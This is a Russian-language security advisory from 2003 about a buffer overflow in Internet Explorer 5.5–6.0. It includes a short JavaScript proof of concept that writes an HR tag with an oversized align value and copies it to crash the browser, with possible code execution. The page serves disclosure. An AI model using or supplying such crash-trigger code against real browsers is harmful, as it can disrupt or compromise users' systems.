Переполнение буфера в Microsoft Internet Explorer

Дата публикации:
24.06.2003
Всего просмотров:
997
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу IE и возможно выполнить произвольный код на системе.

Как сообщает Digital Scream, следующий код приведет к аварийному завершению работы IE:

<script>

 wnd=open("about:blank","",""); 

 wnd.moveTo(screen.Width,screen.Height);

 WndDoc=wnd.document;

 WndDoc.open();

 WndDoc.clear();

 buffer="";

 for(i=1;i<=127;i++)buffer+="X";

 buffer+="DigitalScream";

 WndDoc.write("<HR align='"+buffer+"'>");

 WndDoc.execCommand("SelectAll");

 WndDoc.execCommand("Copy");

 wnd.close();

</script>
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0

Ссылки: Internet Explorer >=5.0 : Buffer overflow
или введите имя

CAPTCHA